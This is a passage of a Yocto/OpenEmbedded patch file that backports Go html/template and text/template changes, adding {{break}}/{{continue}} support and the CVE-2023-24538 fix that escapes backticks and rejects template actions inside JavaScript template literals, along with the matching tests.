++ if nodeName == "range" {
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
++ }
+ c0 := e.escapeList(c, n.List)
+- if nodeName == "range" && c0.state != stateError {
++ if nodeName == "range" {
++ if c0.state != stateError {
++ c0 = joinRange(c0, e.rangeContext)
++ }
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
++
+ // The "true" branch of a "range" node can execute multiple times.
+ // We check that executing n.List once results in the same context
+ // as executing n.List twice.
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
+ c1, _ := e.escapeListConditionally(c0, n.List, nil)
+ c0 = join(c0, c1, n, nodeName)
+ if c0.state == stateError {
++ e.rangeContext = e.rangeContext.outer
+ // Make clear that this is a problem on loop re-entry
+ // since developers tend to overlook that branch when
+ // debugging templates.
+@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
+ c0.err.Description = "on range loop re-entry: " + c0.err.Description
+ return c0
+ }
++ c0 = joinRange(c0, e.rangeContext)
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
+ }
+ c1 := e.escapeList(c, n.ElseList)
+ return join(c0, c1, n, nodeName)
+ }
+
++func joinRange(c0 context, rc *rangeContext) context {
++ // Merge contexts at break and continue statements into overall body context.
++ // In theory we could treat breaks differently from continues, but for now it is
++ // enough to treat them both as going back to the start of the loop (which may then stop).
++ for _, c := range rc.breaks {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.BreakNode).Line
++ c0.err.Description = "at range loop break: " + c0.err.Description
++ return c0
++ }
++ }
++ for _, c := range rc.continues {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.ContinueNode).Line
++ c0.err.Description = "at range loop continue: " + c0.err.Description
++ return c0
++ }
++ }
++ return c0
++}
++
+ // escapeList escapes a list template node.
+ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ if n == nil {
+@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ }
+ for _, m := range n.Nodes {
+ c = e.escape(c, m)
++ if c.state == stateDead {
++ break
++ }
+ }
+ return c
+ }
+@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ // which is the same as whether e was updated.
+ func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
+ e1 := makeEscaper(e.ns)
++ e1.rangeContext = e.rangeContext
+ // Make type inferences available to f.
+ for k, v := range e.output {
+ e1.output[k] = v
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index c709660..fa2b84a 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
+ "<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
+ "",
+ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
+ "z:2:8: on range loop re-entry: {{range}} branches",
+ },
+ {
++ "{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
++ "z:1:29: at range loop break: {{range}} branches end in different contexts",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
++ "z:1:29: at range loop continue: {{range}} branches end in different contexts",
++ },
++ {
+ "<a b=1 c={{.H}}",
+ "z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
+ },
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 7b30294..0228b15 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
+ T0 is executed; otherwise, dot is set to the successive elements
+ of the array, slice, or map and T1 is executed.
+
++ {{break}}
++ The innermost {{range pipeline}} loop is ended early, stopping the
++ current iteration and bypassing all remaining iterations.
++
++ {{continue}}
++ The current iteration of the innermost {{range pipeline}} loop is
++ stopped, and the loop starts the next iteration.
++
+ {{template "name"}}
+ The template with the specified name is executed with nil data.
+
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index 7ac5175..6cb140a 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "fmt"
+ "internal/fmtsort"
+ "io"
+@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
+ return b.String()
+ }
+
++// Sentinel errors for use with panic to signal early exits from range loops.
++var (
++ walkBreak = errors.New("break")
++ walkContinue = errors.New("continue")
++)
++
+ // Walk functions step through the major pieces of the template structure,
+ // generating output as they go.
+ func (s *state) walk(dot reflect.Value, node parse.Node) {
+@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.BreakNode:
++ panic(walkBreak)
+ case *parse.CommentNode:
++ case *parse.ContinueNode:
++ panic(walkContinue)
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
+
+ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ s.at(r)
++ defer func() {
++ if r := recover(); r != nil && r != walkBreak {
++ panic(r)
++ }
++ }()
+ defer s.pop(s.mark())
+ val, _ := indirect(s.evalPipeline(dot, r.Pipe))
+ // mark top of stack before any variables in the body are pushed.
+@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ if len(r.Pipe.Decl) > 1 {
+ s.setTopVar(2, index)
+ }
++ defer s.pop(mark)
++ defer func() {
++ // Consume panic(walkContinue)
++ if r := recover(); r != nil && r != walkContinue {
++ panic(r)
++ }
++ }()
+ s.walk(elem, r.List)
+- s.pop(mark)
+ }
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 3309b33..a639f44 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -563,6 +563,8 @@ var execTests = []execTest{
+ {"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
+ {"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
++ {"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
++ {"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
+ {"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
+ {"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 6784071..95e3377 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -62,6 +62,8 @@ const (
+ // Keywords appear after all the rest.
+ itemKeyword // used only to delimit the keywords
+ itemBlock // block keyword
++ itemBreak // break keyword
++ itemContinue // continue keyword
+ itemDot // the cursor, spelled '.'
+ itemDefine // define keyword
+ itemElse // else keyword
+@@ -76,6 +78,8 @@ const (
+ var key = map[string]itemType{
+ ".": itemDot,
+ "block": itemBlock,
++ "break": itemBreak,
++ "continue": itemContinue,
+ "define": itemDefine,
+ "else": itemElse,
+ "end": itemEnd,
+@@ -119,6 +123,8 @@ type lexer struct {
+ parenDepth int // nesting depth of ( ) exprs
+ line int // 1+number of newlines seen
+ startLine int // start line of this item
++ breakOK bool // break keyword allowed
++ continueOK bool // continue keyword allowed
+ }
+
+ // next returns the next rune in the input.
+@@ -461,7 +467,12 @@ Loop:
+ }
+ switch {
+ case key[word] > itemKeyword:
+- l.emit(key[word])
++ item := key[word]
++ if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
++ l.emit(itemIdentifier)
++ } else {
++ l.emit(item)
++ }
+ case word[0] == '.':
+ l.emit(itemField)
+ case word == "true", word == "false":
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 6510eed..df6aabf 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
+ // keywords
+ itemDot: ".",
+ itemBlock: "block",
++ itemBreak: "break",
++ itemContinue: "continue",
+ itemDefine: "define",
+ itemElse: "else",
+ itemIf: "if",
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index a9dad5e..c398da0 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -71,6 +71,8 @@ const (
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
+ NodeComment // A comment.
++ NodeBreak // A break action.
++ NodeContinue // A continue action.
+ )
+
+ // Nodes.
+@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
+ return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
+ }
+
++// BreakNode represents a {{break}} action.
++type BreakNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
++ return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
++}
++
++func (b *BreakNode) Copy() Node { return b.tr.newBreak(b.Pos, b.Line) }
++func (b *BreakNode) String() string { return "{{break}}" }
++func (b *BreakNode) tree() *Tree { return b.tr }
++func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
++
++// ContinueNode represents a {{continue}} action.
++type ContinueNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
++ return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
++}
++
++func (c *ContinueNode) Copy() Node { return c.tr.newContinue(c.Pos, c.Line) }
++func (c *ContinueNode) String() string { return "{{continue}}" }
++func (c *ContinueNode) tree() *Tree { return c.tr }
++func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
++
+ // RangeNode represents a {{range}} action and its commands.
+ type RangeNode struct {
+ BranchNode
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 5e6e512..7f78b56 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -31,6 +31,7 @@ type Tree struct {
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
+ actionLine int // line of left delim starting action
++ rangeDepth int
+ mode Mode
+ }
+
+@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
+ t.vars = []string{"$"}
+ t.funcs = funcs
+ t.treeSet = treeSet
++ lex.breakOK = !t.hasFunction("break")
++ lex.continueOK = !t.hasFunction("continue")
+ }
+
+ // stopParse terminates parsing.
+@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemBlock:
+ return t.blockControl()
++ case itemBreak:
++ return t.breakControl(token.pos, token.line)
++ case itemContinue:
++ return t.continueControl(token.pos, token.line)
+ case itemElse:
+ return t.elseControl()
+ case itemEnd:
+@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
+ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
++// Break:
++// {{break}}
++// Break keyword is past.
++func (t *Tree) breakControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{break}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{break}} outside {{range}}")
++ }
++ return t.newBreak(pos, line)
++}
++
++// Continue:
++// {{continue}}
++// Continue keyword is past.
++func (t *Tree) continueControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{continue}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{continue}} outside {{range}}")
++ }
++ return t.newContinue(pos, line)
++}
++
+ // Pipeline:
+ // declarations? command ('|' command)*
+ func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+ pipe = t.pipeline(context, itemRightDelim)
++ if context == "range" {
++ t.rangeDepth++
++ }
+ var next Node
+ list, next = t.itemList()
++ if context == "range" {
++ t.rangeDepth--
++ }
+ switch next.Type() {
+ case nodeEnd: //done
+ case nodeElse:
+@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
+ // {{range pipeline}} itemList {{else}} itemList {{end}}
+ // Range keyword is past.
+ func (t *Tree) rangeControl() Node {
+- return t.newRange(t.parseControl(false, "range"))
++ r := t.newRange(t.parseControl(false, "range"))
++ return r
+ }
+
+ // With:
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 220f984..ba45636 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -230,6 +230,10 @@ var parseTests = []parseTest{
+ `{{range $x := .SI}}{{.}}{{end}}`},
+ {"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
+ `{{range $x, $y := .SI}}{{.}}{{end}}`},
++ {"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{break}}{{end}}`},
++ {"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{continue}}{{end}}`},
+ {"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
+ `{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
+ {"template", "{{template `x`}}", noError,
+@@ -279,6 +283,10 @@ var parseTests = []parseTest{
+ {"adjacent args", "{{printf 3`x`}}", hasError, ""},
+ {"adjacent args with .", "{{printf `x`.}}", hasError, ""},
+ {"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
++ {"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
++ {"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
++ {"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
++ {"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
+ // Other kinds of assignments and operators aren't available yet.
+ {"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
+ {"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
new file mode 100644
index 0000000000..baf400b891
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
+From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 20 Mar 2023 11:01:13 -0700
+Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
+
+ECMAScript 6 introduced template literals[0][1] which are delimited with
+backticks. These need to be escaped in a similar fashion to the
+delimiters for other string literals. Additionally template literals can
+contain special syntax for string interpolation.
+
+There is no clear way to allow safe insertion of actions within JS
+template literals, as handling (JS) string interpolation inside of these
+literals is rather complex. As such we've chosen to simply disallow
+template actions within these template literals.
+
+A new error code is added for this parsing failure case, errJsTmplLit,
+but it is unexported as it is not backwards compatible with other minor
+release versions to introduce an API change in a minor release. We will
+export this code in the next major release.
+
+The previous behavior (with the cavet that backticks are now escaped
+properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
+
+This change subsumes CL471455.
+
+Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
+this issue.
+
+Fixes CVE-2023-24538
+For #59234
+Fixes #59271
+
+[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
+[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 2 ++
+ src/html/template/error.go | 13 ++++++++
+ src/html/template/escape.go | 11 +++++++
+ src/html/template/escape_test.go | 66 ++++++++++++++++++++++-----------------
+ src/html/template/js.go | 2 ++
+ src/html/template/js_test.go | 2 +-
+ src/html/template/jsctx_string.go | 9 ++++++
+ src/html/template/state_string.go | 37 ++++++++++++++++++++--
+ src/html/template/transition.go | 7 ++++-
+ 9 files changed, 116 insertions(+), 33 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..0b65313 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -116,6 +116,8 @@ const (
+ stateJSDqStr
+ // stateJSSqStr occurs inside a JavaScript single quoted string.
+ stateJSSqStr
++ // stateJSBqStr occurs inside a JavaScript back quoted string.
++ stateJSBqStr
+ // stateJSRegexp occurs inside a JavaScript regexp literal.
+ stateJSRegexp
+ // stateJSBlockCmt occurs inside a JavaScript /* block comment */.
+diff --git a/src/html/template/error.go b/src/html/template/error.go
+index 0e52706..fd26b64 100644
+--- a/src/html/template/error.go
++++ b/src/html/template/error.go
+@@ -211,6 +211,19 @@ const (
+ // pipeline occurs in an unquoted attribute value context, "html" is
+ // disallowed. Avoid using "html" and "urlquery" entirely in new templates.
+ ErrPredefinedEscaper
++
++ // errJSTmplLit: "... appears in a JS template literal"
++ // Example:
++ // <script>var tmpl = `{{.Interp}`</script>
++ // Discussion:
++ // Package html/template does not support actions inside of JS template
++ // literals.
++ //
++ // TODO(rolandshoemaker): we cannot add this as an exported error in a minor
++ // release, since it is backwards incompatible with the other minor
++ // releases. As such we need to leave it unexported, and then we'll add it
++ // in the next major release.
++ errJSTmplLit
+ )
+
+ func (e *Error) Error() string {
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..29ca5b3 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -8,6 +8,7 @@ import (
+ "bytes"
+ "fmt"
+ "html"
++ "internal/godebug"
+ "io"
+ "text/template"
+ "text/template/parse"
+@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
+ c.jsCtx = jsCtxDivOp
+ case stateJSDqStr, stateJSSqStr:
+ s = append(s, "_html_template_jsstrescaper")
++ case stateJSBqStr:
++ debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
++ if debugAllowActionJSTmpl == "1" {
++ s = append(s, "_html_template_jsstrescaper")
++ } else {
++ return context{
++ state: stateError,
++ err: errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
++ }
++ }
+ case stateJSRegexp:
+ s = append(s, "_html_template_jsregexpescaper")
+ case stateCSS:
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index fa2b84a..1b150e9 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
+ }
+
+ for _, test := range tests {
+- tmpl := New(test.name)
+- tmpl = Must(tmpl.Parse(test.input))
+- // Check for bug 6459: Tree field was not set in Parse.
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree not set properly", test.name)
+- continue
+- }
+- b := new(bytes.Buffer)
+- if err := tmpl.Execute(b, data); err != nil {
+- t.Errorf("%s: template execution failed: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- b.Reset()
+- if err := tmpl.Execute(b, pdata); err != nil {
+- t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree mismatch", test.name)
+- continue
+- }
++ t.Run(test.name, func(t *testing.T) {
++ tmpl := New(test.name)
++ tmpl = Must(tmpl.Parse(test.input))
++ // Check for bug 6459: Tree field was not set in Parse.
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree not set properly", test.name)
++ }
++ b := new(strings.Builder)
++ if err := tmpl.Execute(b, data); err != nil {
++ t.Fatalf("%s: template execution failed: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ b.Reset()
++ if err := tmpl.Execute(b, pdata); err != nil {
++ t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree mismatch", test.name)
++ }
++ })
+ }
+ }
+
+@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
+ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
+ "",
+ },
++ {
++ "<script>var a = `${a+b}`</script>`",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
+ // html is allowed since it is the last command in the pipeline, but urlquery is not.
+ `predefined escaper "urlquery" disallowed in template`,
+ },
++ {
++ "<script>var tmpl = `asd {{.}}`;</script>",
++ `{{.}} appears in a JS template literal`,
++ },
+ }
+ for _, test := range tests {
+ buf := new(bytes.Buffer)
+@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+ {
++ "<a onclick=\"`foo",
++ context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
++ },
++ {
+ `<A ONCLICK="'`,
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index ea9c183..b888eaf 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+ '"': `\u0022`,
++ '`': `\u0060`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
+ '+': `\u002b`,
+@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
+ '"': `\u0022`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
++ '`': `\u0060`,
+ '+': `\u002b`,
+ '/': `\/`,
+ '<': `\u003c`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index d7ee47b..7d963ae 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+- "`abcdefghijklmno" +
++ "\\u0060abcdefghijklmno" +
+ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
+index dd1d87e..2394893 100644
+--- a/src/html/template/jsctx_string.go
++++ b/src/html/template/jsctx_string.go
+@@ -4,6 +4,15 @@ package template
+
+ import "strconv"
+
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[jsCtxRegexp-0]
++ _ = x[jsCtxDivOp-1]
++ _ = x[jsCtxUnknown-2]
++}
++
+ const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
+
+ var _jsCtx_index = [...]uint8{0, 11, 21, 33}
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..6fb1a6e 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -4,9 +4,42 @@ package template
+
+ import "strconv"
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[stateText-0]
++ _ = x[stateTag-1]
++ _ = x[stateAttrName-2]
++ _ = x[stateAfterName-3]
++ _ = x[stateBeforeValue-4]
++ _ = x[stateHTMLCmt-5]
++ _ = x[stateRCDATA-6]
++ _ = x[stateAttr-7]
++ _ = x[stateURL-8]
++ _ = x[stateSrcset-9]
++ _ = x[stateJS-10]
++ _ = x[stateJSDqStr-11]
++ _ = x[stateJSSqStr-12]
++ _ = x[stateJSBqStr-13]
++ _ = x[stateJSRegexp-14]
++ _ = x[stateJSBlockCmt-15]
++ _ = x[stateJSLineCmt-16]
++ _ = x[stateCSS-17]
++ _ = x[stateCSSDqStr-18]
++ _ = x[stateCSSSqStr-19]
++ _ = x[stateCSSDqURL-20]
++ _ = x[stateCSSSqURL-21]
++ _ = x[stateCSSURL-22]
++ _ = x[stateCSSBlockCmt-23]
++ _ = x[stateCSSLineCmt-24]
++ _ = x[stateError-25]
++ _ = x[stateDead-26]
++}
++
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 06df679..92eb351 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
+ stateJS: tJS,
+ stateJSDqStr: tJSDelimited,
+ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
+ stateJSRegexp: tJSDelimited,
+ stateJSBlockCmt: tBlockCmt,
+ stateJSLineCmt: tLineCmt,
+@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, `"'/`)
++ i := bytes.IndexAny(s, "\"`'/")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
+ c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
+ case '\'':
